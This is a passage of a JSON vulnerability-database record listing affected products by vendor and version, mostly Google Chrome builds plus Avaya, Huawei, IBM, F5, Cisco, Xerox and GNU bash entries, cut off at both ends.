"chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.316" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.1" }, { "model": "rack server rh5885h v100r003c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.221.8" }, { "model": "ipso r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.403.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1018.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.229" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.139" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1282.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "gaia embedded r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.26" }, { "model": "aura communication manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "elog v200r003c10spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch121 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.436.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.21" }, { "model": "totalstorage san16b-2 fabric switch 2005-b16", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1030.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.45" }, { "model": "move", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.2" }, { "model": "uma v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "aura communication manager ssp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.679.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.38" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.103" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.644.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.70" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "associates customer experience manager transaction impact monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.17" }, { "model": "totalstorage san256b director model m48 2109-m48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.81" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.313.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.351.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.10" }, { "model": "gaia os r76.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ipso r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.887.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.1" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.36" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.793.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.1" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.71" }, { "model": "system storage san24b-4 2498-b24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1043.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1000.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.317" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.909.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.14" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.318" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.488.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.526.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.56" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0.3" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.808.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.287.0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.584.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1042.0" }, { "model": "bash rc1", "scope": "eq", "trust": 0.3, "vendor": "gnu", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.33" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.907.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.120" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7232" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.29" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.25" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.81" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.823.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.791.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.577.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "oceanstor s5800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.91" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.676.0" }, { "model": "virtual library system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.525.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.10" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.681.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.309" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.97" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.214" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "oceanstor s6900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1050" }, { "model": "storeonce gen backup software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "22.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.135" }, { "model": "oceanstor css v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.11" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.950.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.78" }, { "model": "secureplatform r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.613.0" }, { "model": "espace meeting v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.32" }, { "model": "system networking san96b-5 2498-n96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.182.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.163" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.304" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.162" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77650" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.305" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.0" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.464.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.682.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.15" }, { "model": "protectier enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.940.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.5" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "oceanstor css v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.22" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1683.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.48" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 